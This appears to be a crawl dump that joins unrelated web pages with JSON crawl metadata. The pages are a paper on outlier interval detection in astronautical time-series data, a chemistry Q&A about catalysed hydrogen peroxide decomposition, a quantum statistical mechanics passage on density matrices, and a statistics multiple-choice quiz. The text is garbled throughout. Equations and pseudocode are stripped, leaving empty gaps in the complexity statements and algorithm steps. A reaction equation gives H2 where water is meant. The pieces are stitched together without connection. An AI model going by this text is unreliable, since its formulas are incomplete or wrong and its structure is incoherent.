] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8020657,"math_prob":0.9998975,"size":2303,"snap":"2019-51-2020-05","text_gpt3_token_len":792,"char_repetition_ratio":0.123096995,"word_repetition_ratio":0.0,"special_character_ratio":0.39513677,"punctuation_ratio":0.10835215,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9999939,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-14T10:20:40Z\",\"WARC-Record-ID\":\"<urn:uuid:696d402b-a7fe-469d-8c3b-33794b87d6e4>\",\"Content-Length\":\"40747\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:297e3b50-3013-4be0-8c39-5e9fdcf4c0f4>\",\"WARC-Concurrent-To\":\"<urn:uuid:c036cd27-95e8-463c-93ca-249881e5c39e>\",\"WARC-IP-Address\":\"54.221.217.175\",\"WARC-Target-URI\":\"https://socratic.org/questions/597cae97b72cff300c577dac\",\"WARC-Payload-Digest\":\"sha1:ONH6FQ6ZPR7VROZPIMEOXNLPSIYZCEGI\",\"WARC-Block-Digest\":\"sha1:LNRJZ3QLT2F6TCUTBQWYKDGUNUKOCKHM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540586560.45_warc_CC-MAIN-20191214094407-20191214122407-00444.warc.gz\"}"} |
https://www.hindawi.com/journals/mpe/2013/979035/ | [
"Special Issue\n\n## Fuzzy Computing and Intelligent Transportation\n\nView this Special Issue\n\nResearch Article | Open Access\n\nVolume 2013 |Article ID 979035 | https://doi.org/10.1155/2013/979035\n\nWei Hu, Junpeng Bao, \"The Outlier Interval Detection Algorithms on Astronautical Time Series Data\", Mathematical Problems in Engineering, vol. 2013, Article ID 979035, 6 pages, 2013. https://doi.org/10.1155/2013/979035\n\n# The Outlier Interval Detection Algorithms on Astronautical Time Series Data\n\nAccepted11 Feb 2013\nPublished19 Mar 2013\n\n#### Abstract\n\nThe Outlier Interval Detection is a crucial technique to analyze spacecraft fault, locate exception, and implement intelligent fault diagnosis system. The paper proposes two OID algorithms on astronautical Time Series Data, that is, variance based OID (VOID) and FFT and nearest Neighbour based OID (FKOID). The VOID algorithm divides TSD into many intervals and measures each interval’s outlier score according to its variance. This algorithm can detect the outlier intervals with great fluctuation in the time domain. It is a simple and fast algorithm with less time complexity, but it ignores the frequency information. The FKOID algorithm extracts the frequency information of each interval by means of Fast Fourier Transform, so as to calculate the distances between frequency features, and adopts the KNN method to measure the outlier score according to the sum of distances between the interval’s frequency vector and the nearest frequency vectors. It detects the outlier intervals in a refined way at an appropriate expense of the time and is valid to detect the outlier intervals in both frequency and time domains.\n\n#### 1. Introduction\n\nThe Time Series Data is a sequence of values observed in some periods. Usually, it takes a long time to continuously observe an object and record its data so the accumulated TSD is often in a very large amount. A significant issue is that how to mine latent or interesting knowledge from the huge amount of TSD and apply what is mined to the future. The Astronautical data (AD) is a typical big TSD, which is gathered by frequently and continuously observing spacecrafts. The AD mining techniques have many significant applications, including but not limited to analyzing satellites’ working status, judging faults/errors, and forecasting its next state in the near future. Since it is hard to touch or measure spacecrafts in a shouting distance. The technique to detect outlier intervals from AD is important. The outlier intervals are the exceptional or unusual parts in a long period of the TSD, which cover abundant information about spacecraft faults or special events. The Outlier Interval Detection technique can provide foundation proofs for intelligent astronautical fault analysis, diagnosis and prediction.\n\nAlthough, most spacecrafts work well in most of their lives, the faults and abnormal situations take place occasionally. Namely, the outlier intervals are always drowned in long pieces of regular data. Obviously, it is a very tough mission for a person to find out outliers and make out regulations from the huge AD. Human experts will spend not only plenty of efforts and time, but also some luck. This paper proposes two algorithms to automatically detect the outlier intervals in AD by means of data mining. These algorithms not only are able to promote analysis efficiency, raise diagnosis system’s response performance, but also can be used to support spacecraft fault prediction and diagnosis system as well as astronautical intelligent monitoring system. Additionally, the OID technique has a great perspective in the area of industry production process monitoring, financial administration, medical data analysis, disaster alarm, network intrusion detection, credit card fraud detection, and so forth.\n\nGenerally, there are four ways to implement Outlier Interval Detection, that is, distance based approach, statistic based approach, deviation based approach, and clustering based approach.\n\n(1) The distance based OID calculates the distance between objects firstly, and then the outliers are defined as the objects whose distances to others exceed the given threshold . This is a popular approach because it is simple and easy to implement and does require the knowledge of the data distribution in advance.\n\nAngiulli et al. have done a lot of research on this way . Angiulli and Pizzuti defined an object’s outlier score as the sum of distances between the object and its nearest neighbors. They also introduced a notion of outlier detection solving set , a subset of the data set, to improve the distance based outlier detection performance. Angiulli and Fassetti proposed a DOLPHIN algorithm to carry out the distance based outlier detection in the large database. Later, they proposed a new model that considers only the sum of the distances between the object and the others in the sliding window.\n\nChen et al. proposed a rough set and Nearest Neighbor (KNN) based method to detect the outliers on the mixed continuous and discrete dataset. Bhaduri and Matthews introduced two distributed algorithms and a novel indexing scheme to speed up the distance based outlier detection. Li et al. transformed interval values into real values and then employed the KNN approach to find outliers.\n\n(2) The statistic based OID approach requires the knowledge the probability distribution of the data in advance, which is the foundation of the approach. But for a specific sample space, it is usually hard to know the exact distribution of the data. The key work of the approach is to perform plenty of tests in order to get the most proper distribution model. For example, Takeuchi and Yamanishi proposed a unifying framework that employed a Gaussian mixture model for statistical outlier detection.\n\n(3) The deviation based OID extracts the main features of the center objects, and then the outliers are considered as the objects whose features deviate from the centers remarkably. For example, Oliveira and Meira proposed a neural network method to forecast the thresholds for detecting outliers.\n\n(4) The clustering based OID considers the outliers as the by-products of clustering , that is, the objects that do not belong to any normal cluster.\n\nSome OID methods exploit the Fourier Transform and the Wavelet Transform to extract data features and mine the outliers in a special domain. For example, Rasheed et al. proposed a Fast Fourier Transform and Inverse Fast Fourier Transform based OID method. Grané and Veiga propose a Wavelet Transform based method to detect outliers in financial data.\n\n#### 3. The Outlier Interval Detection\n\n##### 3.1. The Solo Variant TSD and the Outlier Interval\n\nThe solo variant TSD is the observed value of the single object or attribute in a period. Generally, a long period of TSD is divided into many intervals according to the time scale. Thus an interval is a piece of time and the values in the range. The time span of each interval can be equal to each other, such as a day, a week, or 10 days. Some applications may employ unequal interval. But in this paper, a TSD is divided into identical length of intervals.\n\nThe OID of the solo variant aims to find out the oddest outlier intervals from a long period of solo variant TSD, such as the changes of a satellite battery’s voltage in a year. An outlier interval indicates that the variant varies abnormally in the time span so that it deserves a special care. It often reflects some events happened or the symptoms of a fault. The reason of the abnormal data may be diverse, such as device fault, external interference, changes of temperature, and so forth. Figure 1 illustrates some examples of the outlier interval where the 3rd, 4th, 9th, and 10th intervals are apparently different from others.\n\n##### 3.2. The Variance Based Outlier Interval Detection\n\nIn a real astronautical dataset, the abnormally varying data often result in a great fluctuation amplitude. The degree of the amplitude can be directly reflected by the variance in the interval. Namely, the outlier score can be measured by the variance. The higher the value of the variance is, the odder the interval. It is easy to mine the top oddest intervals by means of sorting their variances in descending order.\n\nThe time complexity of the standard variance definition is , where is the number of data because it traverses twice the whole sequence. For a huge amount of AD, it is better to execute a faster algorithm with a smaller time complexity. We transform the standard variance defination to the form given in (1). Both results are identical, but (1) needs only once traverse so its time complexity is one has\n\nPseudocode 1 is the pseudo code of the VOID.\n\n Input: is the TSD, and is the count of the intervals. Output: The top outlier intervals in time domain and their scores. (1) is the set of intervals divided from , that is, (2) for each in (3) (4) (5) endfor (6) The time complexity of the VOID is where is the number of data in the TSD.\n\n##### 3.3. FFT and K Nearest Neighbour Based Outlier Interval Detection\n\nThe VOID algorithm can quickly detect the outlier intervals in time domain. However, many real AD are periodical in some extent. The violent frequency fluctuations also imply something happened. On the other hand, the violent fluctuations in time domain lead to changes in frequency domain. Figure 2 illustrates the frequency spectra of the twelve intervals of the data shown in Figure 1. It is clear that the frequency fluctuations in the 3rd, 4th, 9th, and 10th intervals are distinctly greater than others.\n\nIn order to detect the outliers in a fine granularity, more frequencies have to be taken into account. So a feature vector of an interval is made of the whole frequency band from the lowest frequency to the highest. The outlier score of an interval is measured according to the distance between feature vectors instead of variance. Moreover, an amplitude threshold is set to decline noises, namely; the value is assigned to 0 if it is not higher than the threshold, otherwise it keeps its value.\n\nThe FKOID algorithm firstly divides the whole TSD into intervals equally. Secondly, it executes FFT on each interval to get the frequency spectrum of the interval, which builds a feature vector after the low energy frequencies are set to 0 by the amplitude threshold. Thirdly, the Euclidean distances between every pair of feature vectors are calculated. It should be noted that some frequencies may have an extremely large amplitude so that they are overwhelming in the vector. That will cover the other frequencies’ effect in terms of Euclidean distance. So we set a top threshold to limit the maximum amplitude value of those overwhelming frequencies. At last, the outlier score of an interval is the sum of distances between the interval’s feature vector and its nearest neighbors.\n\nThe idea of the FKOID is inspired by the method of Grané and Veiga . The longer the vector’s distance is, the odder the interval is. Pseudocode 2 is the pseudo code of the FKOID.\n\n Input: is the TSD, and is the count of the intervals, are the amplitude thresholds. Output: The top outlier intervals and their scores. (1) is the set of intervals divided from , that is, (2) for each in (3) (4) endfor (5) for each in (6) (7) endfor (8)\n\nThe FKOID algorithm has to maintain a distance matrix and fetches the nearest neighbors of each interval. The time complexity of that is , where is the number of nearest neighbors, is the number of data in an interval, and is the count of intervals. Since the first stage is the Fast Fourier Transform of each interval, the entire time complexity of the FKOID is .\n\n#### 4. Experimental Results\n\nWe use six real astronautical datasets to test the algorithms. As shown in Figure 3, these AD represent some popular tendencies in the real world. The data of (a), (b), and (c) have distinct violent fluctuations in time domain. The data of (e) and (f) have no great fluctuation in time domain. The data of (d) is the most complicated, which contains diverse variation tendency. Figure 3 illustrate the top 4 outlier intervals detected by the VOID algorithm, and Figure 4 is the results of FKOID, respectively. The Table 1 lists the detailed outlier scores on the 6 AD.\n\n Algorithm (a) (b) (c) (d) (e) (f) VOID Figure 3 1.2001(3), 1.7812(4), 131.66(3), 135.83(5), 0.0076(5), 5.4093(10), 1.0300(9), 1.6907(9), 77.06(10), 128.09(10), 0.0062(1), 5.3548(7), 0.6976(10), 1.4850(3), 72.81(9), 127.37(3), 0.0055(4), 5.3369(8), 0.3677(4) 1.3747(10) 21.37(2) 110.52(9) 0.0055(9) 5.1904(9) FKOID Figure 4 7211(3), 9013(3), 28163(3), 39757(5), 60.94(4), 1479(1), 6515(9), 8856(9), 28083(9), 39619(2), 55.02(1), 1306(10), 6027(10), 7145(10), 26842(10), 39182(1), 53.10(5), 1149(7), 4862(4) 5746(4) 18941(2) 38768(4), 53.03(9) 1096(2)\n\nBased on the experimental results, the VOID algorithm is fit for the case that data varies slightly in the regular situation whereas it becomes violent in the irregular situation. If the normal data waves frequently and varies widely, then the VOID algorithm will have a great error. Additionally, the VOID algorithm is suitable to detect OID in time domain, but failed in the case that data varies peacefully in time domain but violently in frequency domain.\n\nThe FKOID algorithm can solve the problem of OID in frequency domain. It is shown in Figure 4 that the violent fluctuations in time domain have corresponding abnormal changes in the frequency domain. As a result, the FKOID algorithm can detect outlier intervals in time domain as well. However, the FKOID algorithm can detect the very subtle outliers at the expense of long running time because it has a high time complexity.\n\n#### 5. Conclusions\n\nThe OID technique can quickly deal with TSD to find the oddest objects, which often imply crucial exceptional events. It has a great perspective in the astronautical applications, such as the spacecraft fault prediction and diagnosis system, astronautical intelligent monitoring system and other systems based on TSD.\n\nThis paper proposes two algorithms to detect the outlier intervals on astronautical data. The VOID algorithm directly exploits the variance of data to quickly detect the outlier intervals in time domain. The FKOID employ the full frequency band to build a feature vector of an interval and measure the outlier score by the distances sum of the nearest neighbors. The FKOID is subtle enough to detect the outliers in a refined granularity in both frequency and time domains, but its time complexity is a little big.\n\nHowever, the above algorithms are based on the identical length of interval. It is rather arbitrary in practice because the real outlier intervals may be varying in length. So it is our next work to study on the methods of the unequal length Outlier Interval Detection.\n\n#### Acknowledgments\n\nThis research is supported by National Natural Science Foundation of China (Grant 60903123) and the Baidu Theme Research Plan on Large Scale Machine Learning and Data Mining.\n\n1. E. Knorr and R. Ng, “Tucakov. Distance-based outliers: algorithms and applications,” VLDB Journal, vol. 8, no. 3, pp. 237–253, 2000. View at: Google Scholar\n2. F. Angiulli and C. Pizzuti, “Outlier mining in large high-dimensional data sets,” IEEE Transaction on Knowledge and Data Engineering, vol. 17, no. 2, pp. 203–215, 2005. View at: Google Scholar\n3. F. Angiulli, S. Basta, and C. Pizzuti, “Distance-based detection and prediction of outliers,” IEEE Transactions on Knowledge and Data Engineering, vol. 18, no. 2, pp. 145–160, 2006. View at: Google Scholar\n4. F. Angiulli and F. Fassetti, “An efficient algorithm for mining distance-based outliers in very large datasets,” ACM Transactions on Knowledge Discovery from Data, vol. 3, no. 1, pp. 1–57, 2009. View at: Google Scholar\n5. F. Angiulli and F. Fassetti, “Distance-based outlier queries in data streams: the novel task and algorithms,” Data Mining and Knowledge Discovery, vol. 20, no. 2, pp. 290–324, 2010. View at: Publisher Site | Google Scholar | MathSciNet\n6. Y. Chen, D. Miao, and H. Zhang, “Neighborhood outlier detection,” Expert Systems with Applications, vol. 37, no. 12, pp. 8745–8749, 2010. View at: Google Scholar\n7. K. Bhaduri and B. L. Matthews, “Algorithms for speeding up distance-based outlier detection,” in Proceedings of the 17th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (SIGKDD '11), pp. 859–867, 2011. View at: Google Scholar\n8. S. Li, R. Lee, and S. D. Lang, “Detecting outliers in interval data,” in Proceedings of the Southeast regional conference (ACM-SE '06), pp. 290–295, 2006. View at: Google Scholar\n9. J. Takeuchi and K. Yamanishi, “A unifying framework for detecting outliers and change points from non-stationary time series data.,” IEEE Transactions on Knowledge and Data Engineering, vol. 18, no. 4, pp. 482–492, 2006. View at: Google Scholar\n10. A. Oliveira and S. Meira, “Detecting novelties in time series through neural networks forecasting with robust confidence intervals,” Neurocomputing, vol. 70, no. 1–3, pp. 79–92, 2006. View at: Google Scholar\n11. C. Böhm, C. Faloutsos, and C. Plant, “Outlier-robust clustering using independent components,” in Proceedings of the 28th ACM SIGMOD International Conference on Management of Data (SIGMOD '08), pp. 185–198, 2008. View at: Google Scholar\n12. N. Ade and B. Zadronzy, “Outlier detection by active learning,” in Proceedings of the 12th ACM SIGMOD International Conference on Management of Data (SIGMOD '06), pp. 504–509, 2006. View at: Google Scholar\n13. C. Franke and M. Gertz, “ORDEN: outlier region detection and exploration in sensor networks,” in Proceedings of the 29th ACM SIGMOD International Conference on Management of Data (SIGMOD '09), pp. 1075–1078, 2009. View at: Google Scholar\n14. F. Rasheed et al., “Fourier transform based spatial outlier mining,” Lecture Notes in Computer Science, pp. 317–324, 2009. View at: Google Scholar\n15. A. Grané and H. Veiga, “Wavelet-based detection of outliers in financial time series,” Computational Statistics & Data Analysis, vol. 54, no. 11, pp. 2580–2593, 2010. View at: Publisher Site | Google Scholar | MathSciNet"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.89622736,"math_prob":0.92257273,"size":17293,"snap":"2022-05-2022-21","text_gpt3_token_len":3748,"char_repetition_ratio":0.15154144,"word_repetition_ratio":0.06270154,"special_character_ratio":0.21604118,"punctuation_ratio":0.13380498,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9771279,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-16T12:25:25Z\",\"WARC-Record-ID\":\"<urn:uuid:d47e4999-940a-42e9-9033-e364699ebf91>\",\"Content-Length\":\"532048\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d9abe5b9-92cc-4146-9259-b05ad2b3d6d6>\",\"WARC-Concurrent-To\":\"<urn:uuid:ff8fc379-3612-4ad5-8885-7936fd3c5714>\",\"WARC-IP-Address\":\"18.67.65.91\",\"WARC-Target-URI\":\"https://www.hindawi.com/journals/mpe/2013/979035/\",\"WARC-Payload-Digest\":\"sha1:EAYX7LHQAXJ2KERNOSKS2TYWCATO7OYO\",\"WARC-Block-Digest\":\"sha1:6UOYRYPNAGHVBOPO6S6FC3U3MVC4KRC5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662510117.12_warc_CC-MAIN-20220516104933-20220516134933-00194.warc.gz\"}"} |
https://chemistry.stackexchange.com/questions/66949/demonstrating-decomposition-of-hydrogen-peroxide-using-ironiii-nitrate-catalys | [
"# Demonstrating decomposition of hydrogen peroxide using iron(III) nitrate catalyst\n\nI need a way to prove/show that hydrogen peroxide was decomposed through use of catalyst.\n\nI want to ensure that my catalyst: $\\ce{Fe(NO3)3}$ or iron(III) nitrate is a catalyst, not a reactant/ consumed during the reaction.\n\n$$\\ce{2 H2O2 (aq) ->[Fe(NO3)3 (s)] 2 H2O (l) + O2 (g)}$$\n\n• When the reaction is happening, I will introduce a wooden glowing splint over the bubbling reaction and the wooden splint glowing brighter or reigniting will show that oxygen is being produced.",
null,
"Question:\n\n• Now, how do I show that water is produced? Would I just boil the product I get after reaction (image above) and put cobalt chloride paper at the water vapour?\n\n• Also, if I were to use the orange solution above again as a catalyst (since it still contains iron(III) nitrate), would hydrogen peroxide decompose again? If so, is there a way to put iron(III) nitrate back to its solid state? or any way to reuse as catalyst?\n\nEdit:\n\nIf it is easier to answer, it doesn't have to be with iron(III) nitrate. I have an option to use manganese dioxide, which is another catalyst that I can substitute for iron(III) nitrate. I think it should be OK since it does the exact same reaction.\n\nDetection of oxygen: Detection of $\\ce{O2}$ by a glowing splint is a good way to detect the oxygen. Also you could capture the gas by a simple fixture e.g.",
null,
"and demonstrate the volume change in the receiver. This way you can actually measure moles $\\ce{O2}$ produced (by $PV=nRT$) then moles $\\ce{H2O2}$ decomposed stoichiometrically by the formula you've written.\n\nChoice of catalyst: Using $\\ce{MnO2}$ would be better if you want to make sure you have a catalyst. $\\ce{MnO2}$ will not be consumed during the decomposition; I'm not sure about iron(III) nitrate.\n\nOr, detecting change in $\\ce{Fe(NO3)3}$ concentration: Addition of a very small concentration of potassium thiocyanate, $\\ce{KSCN}$ (say 1/100 of your $\\ce{Fe^{+3}}$ concentration) will yield a deep red product, iron thiocyanate ($\\ce{Fe(SCN)^{+2}}$). If you have access to a spectrometer you can measure absorbance of the initial solution's product and the product after decomposing $\\ce{H2O2}$.\n\nProve water was produced: The best way I can think of is to measure the (subtle) change of density of your solution before and after decomposition. Using $\\ce{MnO2}$ would make this easy because you can remove/filter it as a solid after decomposition and thus measure mass/volume of your solution before and after. $\\ce{H2O2}$ and $\\ce{H2O}$ have small albeit detectably different densities at RT. $\\ce{H2O2}$ is more dense than water so your density should decrease.\n\n• How would i remove/filter manganese dioxide as solid from water? Is there any specific equipment? Or wcan i just boil it to remove water? – didgocks Jan 25 '17 at 12:22\n• Just filter paper through a funnel, maybe a vacuum if you want to be thorough. – khaverim Jan 25 '17 at 16:02\n• Would there be a way to prove water for iron(III) nitrate? – didgocks Jan 25 '17 at 20:50\n• You can probably still detect a small decrease in density even with iron(III) nitrate in solution – khaverim Jan 25 '17 at 20:54\n\nYes, apart from potassium iodide which is commonly used as a catalyst in the decomposition of hydrogen peroxide, $\\ce{Fe^3+}$ salts, manganese dioxide and nickel hydroxide can be used as a catalysts as alternatives. Since, iron nitrate contains $\\ce{Fe^3+}$, it can be used as catalyst.\n\nThere are some papers that discuss the use of $\\ce{Fe^3+}$ salts as catalyst. Following is the relevant information from the papers:\n\nWe should consider the role of the Ferric Chloride ($\\ce{FeCl3}$) as catalyst in the decomposition reaction of hydrogen peroxide.(...) The fact is that Iron can exist in two different oxidation states, $\\ce{Fe^2+}$ (Ferrous) and $\\ce{Fe^3+}$ (Ferric), allows the catalyst to break the reaction into two different redox steps, each of which has a lower energy barrier to completion than the uncatalyzed reaction:\n\n$$\\ce{H2O2(aq) + 2Fe^3+(aq) -> O2(g) + 2 Fe^2+(aq) + 2H+(aq)}$$ $$\\ce{H2O2(aq) + 2 Fe^2+(aq) + 2 H+ (aq) -> 2H2(l) + 2Fe^3+(aq)}$$\n\nNote the first step in the catalyzed reaction involves reduction of the Ferric Ion ($\\ce{Fe^3+}$) to the Ferrous Ion ($\\ce{Fe^2+}$), which is then re-oxidized to Ferric Ion ($\\ce{Fe^3+}$) in the second step. Hence, on net, the catalyst is not consumed during the course of the decomposition.\n\n$\\ce{Fe^3+}$ ions is actually a homogeneous catalyst. The catalytic decomposition of hydrogen peroxide can be essentially explained by two different mechanisms based on the mutual redox transition Fe(III)/Fe(V) (KREMER-STEIN mechanism) and Fe(III)/Fe(II) (HABER-WEISS mechanism), respectively.\n\nAccording to the mechanism proposed by KREMER and STEIN an intermediate oxygen complex of iron with oxidation number +V is primarily formed by the reaction of $\\ce{Fe^3+}$ with $\\ce{H2O2}$. This complex reacts with another $\\ce{H2O2}$ molecule to water and oxygen thereby reforming $\\ce{Fe^3+}$.\n\n$$\\ce{Fe^3+ + H2O2 <=> [Fe^{III}OOH]^2+ + 2H+ <=> [Fe^{V}O]^3+ + H2O ->[H2O2] Fe^3+ + 2H2O + O2}$$\n\nAccording to the mechanism proposed by HABER and WEISS the $\\ce{Fe^3+}$ ions initiate a radical reaction, after which the chain reaction consumes the hydrogen peroxide. This mechanism can explain the high reaction rate very well.\n\nChain initiation: $\\ce{Fe^3+ + H2O2 <=> [Fe^{III}OOH]^2+ + 2H+ <=> Fe^2+ + HOO. + H+}$\n\nChain propagation: $\\ce{Fe^2+ + H2O2 -> Fe^3+ + 2OH.}$ $\\ce{Fe^3+ + H2O2 + OH. -> Fe^3+ + HOO. + H2O -> Fe^2+ + H+ + O2 + H2O }$"
] | [
null,
"https://i.stack.imgur.com/dlkku.jpg",
null,
"https://i.stack.imgur.com/8SF3A.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8573365,"math_prob":0.99130887,"size":2733,"snap":"2019-51-2020-05","text_gpt3_token_len":864,"char_repetition_ratio":0.15060462,"word_repetition_ratio":0.023809524,"special_character_ratio":0.30406147,"punctuation_ratio":0.089108914,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99570537,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,6,null,6,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-28T08:24:18Z\",\"WARC-Record-ID\":\"<urn:uuid:cdea033b-246c-4bae-ac8a-4b84d3bf15b6>\",\"Content-Length\":\"146643\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bce21323-e832-4233-bead-eb5ce5d49bcc>\",\"WARC-Concurrent-To\":\"<urn:uuid:1987de92-ccde-42d1-97c0-7cb0a499cee3>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://chemistry.stackexchange.com/questions/66949/demonstrating-decomposition-of-hydrogen-peroxide-using-ironiii-nitrate-catalys\",\"WARC-Payload-Digest\":\"sha1:JSLHENP54V5VGKF2VYGHOZAV2DDZW6PV\",\"WARC-Block-Digest\":\"sha1:CAKNDTUSZW6EHVKL4QQYAE6FAIJTRW3S\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251776516.99_warc_CC-MAIN-20200128060946-20200128090946-00470.warc.gz\"}"} |
https://ebrary.net/153909/mathematics/expectation_value_physical_observable | [
"# Expectation Value of a Physical Observable\n\nConsider a physical observable F defined by its quantum mechanical operator F, and the evolution of the system is described by a Hamiltonian H with the basis vectors |Ф„), defined by the eigenvalue equation:",
null,
"From quantum mechanics, the diagonal matrix element F„„ is described by the following equation",
null,
"with Ф„({q Ф„), and Ф* (q) = (Ф„ |q). The matrix element F„„ in 14.4 permits to evaluate the expectation value of the physical observable F quantized as an operator F:",
null,
"or",
null,
"So, for a mixed state the expectation value of the physical observable F is written as:",
null,
"We see that it has two averaging procedures, one is the usual quantum mechanical average procedure in 14.4 and the other is the classical averaging of multiplying the probability of being in a state by the value of being in that state as in 14.5 as well as in 14.6.\n\n# Density Matrix\n\nIn relation 14.7, it is obvious that the quantity",
null,
"Since the coefficients W„ are real then p(q,q') is obviously a Hermitian operator and so can be diagonalized. Here, p{q,q') is the so-called density matrix in the coordinate representation - a fundamental quantity that is the summit in quantum statistical mechanics from where all concepts are derived as well as the concepts of thermal equilibrium and temperature T clarified. This requires the definition of the weighted function of eigenstates for any operator,",
null,
"This is the so-called statistical density matrix (that is positive definite) in the coordinate representation that is the matrix element of the density operator and also determines the thermal average of the particle density of a quantum-statistical system:",
null,
"In relation 14.9, the quantities and W„ are the eigenfunctions and eigenvalues of p indicative that p(q,q') corresponds to a mixture of pure states of the wave functions VJq) with the respective weights W„. In 14.10, |4'„){4(n| can be interpreted as the probability distribution of the system in the eigenstate |4,„), while W„, the normalized probability to encounter the system in the state |VF„). So, p{q,q') should be the normalized average particle density in space. The advantage of working with p{q,q') rather than the wave functions is that we can more easily treat an infinite volume that avoids the complications of the boundaries of the system. For the evaluation of the partition function Z by explicit calculation of we must take a large, but finite volume. It is instructive to note that at low temperatures, only the lowest energy state survives and p(q,q') achieves the particle distribution at the ground state. At high temperatures, quantum effects are expected to be irrelevant and we therefore expect matrix density p(q,q') to imitate that of a classical particle distribution.\n\nThe expression 14.9 applies generally to a mixed state. The physical sense of the density operator in 14.10 entails that for any Hermitian operator p we may always find such a representation, say |^Р(), for which it is diagonalized. From 14.10, we may reformulate quantum mechanics: Any system is described by the density matrix in 14.10 with\n\n(a) |*Fj) being some complete orthonormal set of vectors and the probability W, has the following properties:",
null,
"(b) For a given operator, F the quantum mechanical-statistical expectation value can be found via a trace, for any representation,",
null,
"Since {'P,|f|'P,) is the expectation value of F in the state I'P,) then from a) to d) the density matrix pti in the diagonal 14* f) representation is, simply, interpreted as the probability of the system to be found in the state |4*,). Generally, deriving the density matrix from 14.10 as well as in 14.13 we do not define concretely the exact diagonal representation and at least suppose they exist. If all but one of the W, is zero, then the system is in the pure state :",
null,
"and otherwise it is in the mixed state. So, the density matrix handles both pure and mixed states."
] | [
null,
"https://ebrary.net/htm/img/33/1408/1307.png",
null,
"https://ebrary.net/htm/img/33/1408/1308.png",
null,
"https://ebrary.net/htm/img/33/1408/1309.png",
null,
"https://ebrary.net/htm/img/33/1408/1310.png",
null,
"https://ebrary.net/htm/img/33/1408/1311.png",
null,
"https://ebrary.net/htm/img/33/1408/1312.png",
null,
"https://ebrary.net/htm/img/33/1408/1313.png",
null,
"https://ebrary.net/htm/img/33/1408/1314.png",
null,
"https://ebrary.net/htm/img/33/1408/1315.png",
null,
"https://ebrary.net/htm/img/33/1408/1316.png",
null,
"https://ebrary.net/htm/img/33/1408/1317.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.91644084,"math_prob":0.9928393,"size":3916,"snap":"2022-40-2023-06","text_gpt3_token_len":864,"char_repetition_ratio":0.14621677,"word_repetition_ratio":0.01236476,"special_character_ratio":0.22318693,"punctuation_ratio":0.10381077,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99813324,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-30T22:08:54Z\",\"WARC-Record-ID\":\"<urn:uuid:d077be63-1896-40b3-9c4b-920da88a2b5b>\",\"Content-Length\":\"33080\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1c88c157-eb37-49b2-ac32-3dde3f185dcf>\",\"WARC-Concurrent-To\":\"<urn:uuid:af4f7c90-884e-4931-ab67-ee9cee4e7630>\",\"WARC-IP-Address\":\"5.45.72.163\",\"WARC-Target-URI\":\"https://ebrary.net/153909/mathematics/expectation_value_physical_observable\",\"WARC-Payload-Digest\":\"sha1:OOMTJJJURZ4HZUEEEPJUQZTOKVO5O2R2\",\"WARC-Block-Digest\":\"sha1:RPNOZQVS3RWFSIXDSIC5RNKQKIYGQMWI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030335504.37_warc_CC-MAIN-20220930212504-20221001002504-00066.warc.gz\"}"} |
https://www.soladisinstitute.fr/en/evaluation/ | [
"Complete the MSG1 multiple-choice quizzes to find out the training appropriate to you :\n\n 1. Which of the following statements are true? a. The median is the most frequently observed value. True False b. Half of the results are less than or equal to the median. True False c. On a small sample, the median is impacted by outliers True False d. The median and the mean are always very close. True False e. The median, second quartile, 5th decile and 50th percentile are always the same. True False 2. The following values were obtained: 12 – 6 – 12 – 8 – 10 a. What is the mean ? b. What is the median ? c. What is the mode ? d. What is the range ? 3. Which of the following statements are true? a.The 95% confidence interval associated to the mean indicates the interval in which the “true” mean has a 95% probability to be. True False b. The width of the confidence interval decreases as the sample size increases. True False c. The width of the confidence interval decreases as the alpha risk decreases (= as the probability increases). True False 4. Which of the following statements are true? a. The Pareto chart is used to display categorical variables in order of importance. True False b. The histogram is the most suitable plot to visualize the sample distribution. True False c. The scatterplot shows a potential correlation between 2 series of data True False d. The boxplot allows comparison of both the dispersions and the averages of several data sets. True False 5. 5. For Gaussian data (normal distribution), what is the theoretical percentage of the population in the range: mean ± 1.96* standard deviation a. 95 % b. 95,45 % c. 99 % d. 99,73 % 6. 4 dice are rolled simultaneously. The outcome is the sum of these dice and the experiment is repeated many times. What is the distribution associated to the sum? a. Binomial distribution b. Normal distribution c. Student’s distribution d. Fisher’s distribution\n\nWe recommend that you take the MSG1 or MSG2 courses to learn or review basic 